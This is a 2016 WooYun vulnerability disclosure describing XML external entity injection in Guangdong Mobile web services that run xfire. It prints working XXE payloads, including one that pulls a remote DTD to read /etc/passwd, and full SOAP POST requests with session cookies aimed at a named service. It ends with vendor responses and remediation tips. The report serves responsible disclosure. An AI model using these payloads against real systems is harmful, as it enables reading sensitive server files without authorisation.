当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167677

漏洞标题:广东移动重要系统XML实体注入漏洞

相关厂商:中国移动广东省分公司

漏洞作者: applychen

提交时间:2016-01-06 11:34

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

XML实体注入漏洞

详细说明:

其实还是xfire导致XXE问题,详细见我上一个漏洞分析http://**.**.**.**/bugs/wooyun-2016-0166751
首先是广东和教育使用了xfire实现webservice:

http://**.**.**.**/webservices


1.png


使用WVS导入以下链接:

http://**.**.**.**//webservices/IHDZWXxtWs?wsdl


2.png


使用http editor编辑POST数据包填入EXP发送,曝出路径:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "a">%remote;]>


3.png


然后根据路径去读取各个敏感文件(或者列目录),这里只读取/etc/passwd进行演示:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip/1.xml">%remote;]>


4.png

5.png


第二处存在于4avpn中:

https://**.**.**.**/webservices/RoamService?wsdl


6.png


这里需要访问首页获取一个COOKIE然后填入POST包,如下:

POST https://**.**.**.**/webservices/RoamService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
Cookie: NSC_AAAC=5602e6da7daa89762a1a2c64b6e7284a; NSC_DBTQ_**.**.**.**_443_mcwjq=ffffffff09f3f59345525d5f4f58455e445a4a42378b; JSESSIONID=00007rCbPz7dnd-c9aagCpSz5n4:16duo2of2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "**.**.**.**">%remote;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/RoamService">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:applyRoamTicket>
<urn:in0>1</urn:in0>
</urn:applyRoamTicket>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


7.png


这里服务器在内网无法对外连接,当使用公网地址时候程序会陷入延迟:

POST https://**.**.**.**/webservices/RoamService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
Cookie: NSC_AAAC=5602e6da7daa89762a1a2c64b6e7284a; NSC_DBTQ_**.**.**.**_443_mcwjq=ffffffff09f3f59345525d5f4f58455e445a4a42378b; JSESSIONID=00007rCbPz7dnd-c9aagCpSz5n4:16duo2of2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "**.**.**.**:8080/">%remote;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/RoamService">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:applyRoamTicket>
<urn:in0>1</urn:in0>
</urn:applyRoamTicket>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


XXE还会导致DOS,DOS影响太大不可控这里就不测试了。

漏洞证明:

同上

修复方案:

1、移动中使用xfire的系统还是挺多的可以自查一下
2、升级为CXF或者过滤<!DOCTYPE等关键字

版权声明:转载请注明来源 applychen@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-08 21:56

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-06 11:37 | hecate ( 普通白帽子 | Rank:743 漏洞数:113 | ®高级安全工程师 | WooYun认证√)

    前排学习实体注入

  2. 2016-01-06 11:47 | 带我玩 ( 路人 | Rank:14 漏洞数:7 | 带我玩)

    前排学习实体注入

  3. 2016-01-06 12:03 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    表哥发洞,必须关注。

  4. 2016-01-06 12:54 | 蓝天 ( 普通白帽子 | Rank:414 漏洞数:101 | 互联网上拾破烂的胖子)

    前排学习实体注入

  5. 2016-01-08 14:31 | cncert国家互联网应急中心(乌云厂商)

    您好! 感谢您对CNVD的支持,请您协助CNVD提供下漏洞远程引入的外部实体文件 http://ip/1.xml 内容,并邮件反馈至vreport@cert.org.cn,以便CNVD及时处置。祝好!

  6. 2016-01-09 17:24 | N0Hacker ( 路人 | Rank:8 漏洞数:2 | N0Hacker)

    前排学习实体注入

  7. 2016-01-12 10:57 | kevinchowsec ( 实习白帽子 | Rank:51 漏洞数:17 | 周凯文,信息安全爱好者。)

    前排学习实体注入